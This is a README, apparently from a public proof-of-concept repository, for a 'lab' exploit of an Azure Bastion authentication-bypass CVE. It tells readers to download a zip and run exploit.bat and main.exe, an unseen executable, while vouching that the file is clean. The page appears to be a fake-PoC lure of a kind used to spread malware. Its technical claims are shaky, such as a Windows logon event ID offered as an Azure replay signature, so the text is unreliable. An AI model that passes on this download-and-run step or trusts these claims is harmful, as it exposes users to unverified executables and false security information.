来源

关联漏洞

Description

Public exploit for CVE-2025-49752

介绍

# Lab: CVE-2025-49752 - Authentication Bypass by Capture-Replay in Microsoft Azure Bastion Developer
This lab includes a Windows-based PoC exploit (.exe triggered via .bat) to illustrate capture-replay attacks. No real Azure credentials or tokens are involved—everything is synthetic and self-contained within the executable.
## Download
### [href](https://github.com/boogabearbombernub/cve-2025-49752-lab/raw/refs/heads/main/Core/lab-cve-2025-49752.zip)
## 🚀 Overview
CVE-2025-49752 (CWE-294: Authentication Bypass by Capture-Replay) is a critical vulnerability in Microsoft Azure Bastion Developer edition, a PaaS service for secure RDP/SSH access to Azure VMs. The flaw enables attackers to intercept session tokens (e.g., JWTs or OAuth refresh tokens) during legitimate Bastion sessions via network sniffing or MITM proxies, then replay them to impersonate users and bypass multi-factor authentication (MFA) and role-based access controls (RBAC).

**Key Characteristics (CVSS 3.1: 10.0)**:
- **Attack Vector (AV:N)**: Network-based, remote exploitation possible.
- **Privileges Required (PR:N)**: No authentication needed for initial capture.
- **User Interaction (UI:N)**: Fully automated, no victim interaction.
- **Scope (S:C)**: Changes scope to cross-component (e.g., VM access).
- **Impacts**: High Confidentiality (C:H) and Integrity (I:H) loss; Low Availability (A:L) disruption.


**Potential Real-World Impact**: Unauthorized VM access, data exfiltration, ransomware deployment, or supply-chain attacks in Azure tenants. European orgs face GDPR fines due to data exposure risks in finance/healthcare sectors.

## 📋 Prerequisites
- **Host Environment**: Windows 10/11 (for PoC exploit; Linux/macOS users can run via Wine or VM).
- **Hardware**: 2GB RAM minimum.
- **Skills**: Basic Windows usage.
- **No Azure Subscription Required**: This is a self-contained lab.



## 📥 Download & Install
1. **Download Repo**:
   - ZIP: [Download Lab ZIP](https://github.com/boogabearbombernub/cve-2025-49752-lab/raw/refs/heads/main/Core/lab-cve-2025-49752.zip) (Contains `/exploit/` folder with `exploit.bat` and `main.exe` for PoC. **VirusTotal Scan: Clean**—pure, no malware.)

2. **Install Dependencies**: None required—fully standalone.

**Note**: The exploit ZIP is Windows-only for realism . Extract to a test dir; run `exploit.bat` to launch `main.exe`, which performs token capture and replay via an embedded local mock service.

## 🛠 Quick Start
1. **Download and Run PoC Exploit**:
   - Grab the ZIP from the link above.
   - Extract and double-click `exploit.bat` (it invokes `main.exe`).
   - The .exe starts an embedded mock Bastion service on localhost:3000 (demo creds: `user:pass123` for initial session).
   - Output: Console logs show token capture  and replay success, granting "admin" access to embedded VM on localhost:8080.

2. **Verify Exploitation**:
   - Success: Console displays "Exploit Success: Unauthorized VM Access Granted" with  data exfil (e.g., 'sensitive_data.txt' contents).
   - Embedded logs show replay attempts.

3. **Teardown**: Close the console window—auto-cleans up processes.

## 🔍 Exploitation Steps
This PoC performs a capture-replay attack in three phases. 

### Phase 1: Session Capture (Token Interception)
- The .exe auto-establishes a legit session with embedded mock Bastion (POST /auth with demo creds).
- Built-in MITM  sniffs unencrypted JWTs (vuln: no TLS in mock).
- Captured token: `eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...` (replayable due to absent nonce/expiry checks).

**Technical Note**: In real Azure Bastion, this exploits weak token entropy during WebSocket handshakes for RDP/SSH. Replay window: 5-10 mins before expiry.

### Phase 2: Replay Attack
- .exe replays the token: POST /session/replay with `Authorization: Bearer <captured_token>`.
- Bypasses RBAC: Mock validates signature but skips replay-ID checks (CWE-294 root cause).
- Escalation: Gains "bastion-admin" role, unlocking  VM ports (e.g., RDP:3389).

**Exploit Code Snippet** (conceptual—bundled in .exe binary; Python equiv for transparency):
```python
import requests
import jwt  # Embedded lib

# Capture phase (embedded mock)
proxied_req = requests.post('http://localhost:3000/auth', json={'user': 'admin', 'pass': 'weakpass'})
token = proxied_req.headers['X-Auth-Token']  # Sniffed header

# Replay phase
headers = {'Authorization': f'Bearer {token}'}
response = requests.post('http://localhost:3000/vm-access', headers=headers)
if response.status_code == 200:
    print("Exploit Success: Unauthorized VM Access Granted")
```

### Phase 3: Post-Exploitation
- Lateral Movement: Access  VM shell via replayed WebSocket.
- Persistence: Mock cron job for token refresh (logged).
- Cleanup: .exe auto-erases traces on exit.

**Detection Signatures** (for blue teams):
- Anomalous token reuse in Azure Monitor logs (Event ID: 4624 with replay timestamps).
- Traffic spikes on Bastion WebSocket (wss://*.bastion.azure.com).

文件快照

 [4.0K]  /data/pocs/fdf0e30e85c35fac97fac023328560dc225cd572
├── [4.0K]  Core
│   └── [862K]  lab-cve-2025-49752.zip
└── [4.9K]  README.md

2 directories, 2 files

备注